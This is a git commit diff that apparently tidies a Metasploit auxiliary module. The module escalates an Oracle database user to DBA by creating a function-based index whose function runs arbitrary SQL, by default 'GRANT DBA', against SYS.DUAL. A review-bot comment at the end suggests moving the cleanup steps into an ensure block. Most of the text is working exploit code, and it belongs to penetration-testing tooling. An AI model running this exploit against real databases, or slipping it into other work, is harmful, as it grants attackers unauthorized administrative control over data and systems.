Clean up module
parent
bd41895fc4
commit
d0f1f72426
|
@ -26,10 +26,3 @@
|
|||
**TABLE**
|
||||
|
||||
Table to create the index on.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Escalating an Oracle SQL account to database administrator privileges.
|
||||
|
||||
```
|
||||
```
|
||||
|
|
|
@ -9,9 +9,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle DB Privilege Escalation via function-based index',
|
||||
'Name' => 'Oracle DB Privilege Escalation via Function-Based Index',
|
||||
'Description' => %q{
|
||||
This module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. Credits to David Litchfield for publishing the technique.
|
||||
This module will escalate an Oracle DB user to DBA by creating a
|
||||
function-based index on a table owned by a more-privileged user.
|
||||
Credits to David Litchfield for publishing the technique.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -25,11 +27,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
],
|
||||
'DisclosureDate' => 'Jan 21 2015'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
|
||||
OptString.new('TABLE', [ true, 'Table to create the index on.', "SYS.DUAL"]),
|
||||
])
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}" ]),
|
||||
OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]),
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
@ -37,52 +39,51 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
func_name = Rex::Text.rand_text_alpha(6..10)
|
||||
|
||||
create_function = "
|
||||
create_function = <<-EOF
|
||||
CREATE OR REPLACE FUNCTION #{func_name}
|
||||
(FOO varchar) return varchar
|
||||
deterministic authid current_user is
|
||||
pragma autonomous_transaction;
|
||||
begin
|
||||
execute immediate '#{datastore['SQL']}';
|
||||
execute immediate '#{datastore['SQL'].gsub("'", "\\\\'")}';
|
||||
commit;
|
||||
return '';
|
||||
end;
|
||||
"
|
||||
EOF
|
||||
|
||||
index_name = Rex::Text.rand_text_alpha(6..10)
|
||||
param_value = Rex::Text.rand_text_alpha(2..6)
|
||||
|
||||
create_index = "
|
||||
CREATE INDEX #{index_name} ON
|
||||
#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))"
|
||||
create_index = "CREATE INDEX #{index_name} ON " \
|
||||
"#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))"
|
||||
|
||||
trigger = "SELECT * FROM #{datastore['TABLE']}"
|
||||
|
||||
clean_index = "drop index #{index_name}"
|
||||
clean_func = "drop function #{func_name}"
|
||||
|
||||
print_status("Running exploit...")
|
||||
print_status('Running exploit...')
|
||||
|
||||
begin
|
||||
print_status("Attempting to create function #{func_name}...")
|
||||
print_status(create_function)
|
||||
prepare_exec(create_function)
|
||||
print_status("Attempting to create index #{index_name}...")
|
||||
print_status(create_index)
|
||||
prepare_exec(create_index)
|
||||
print_status("Querying to trigger function...")
|
||||
print_status(trigger)
|
||||
print_status('Querying to trigger function...')
|
||||
prepare_exec(trigger)
|
||||
print_status("Cleaning up index...")
|
||||
print_status(clean_index)
|
||||
print_status('Cleaning up index...')
|
||||
prepare_exec(clean_index)
|
||||
print_status("Cleaning up function...")
|
||||
print_status(clean_func)
|
||||
print_status('Cleaning up function...')
|
||||
prepare_exec(clean_func)
|
||||
print_status("Exploit complete!")
|
||||
print_status('Exploit complete!')
|
||||
rescue ::OCIError => e
|
||||
print_error("Error! #{e.message}")
|
||||
end
|
||||
end
|
||||
|
||||
def prepare_exec(query)
|
||||
print_status(query)
|
||||
super
|
||||
end
|
||||
|
||||
end
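Review bot: The two cleanup calls at the end of the `begin` block in `run` (`prepare_exec(clean_index)` and `prepare_exec(clean_func)`) are skipped whenever an earlier statement raises `::OCIError`. A failed run therefore leaves the generated function, whose body embeds the operator-supplied SQL, and possibly the index on the target table behind in the assessed database. Moving both drops into an `ensure` clause, each with its own `rescue ::OCIError`, removes whatever was created even on failure; dropping an object that was never created then only reports an error. `run` starts in the previous hunk, and the `prepare_exec` override at the end of this section appears to log each statement already, so the cleanup needs no extra `print_status` of the query text.

```ruby
      # … unchanged: create function, create index, trigger query, status messages …
    rescue ::OCIError => e
      print_error("Error! #{e.message}")
    ensure
      # Drop whatever was created, even when an earlier statement failed.
      [clean_index, clean_func].each do |stmt|
        begin
          prepare_exec(stmt)
        rescue ::OCIError => e
          print_error("Cleanup failed: #{e.message}")
        end
      end
    end
```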
|
||||
|
|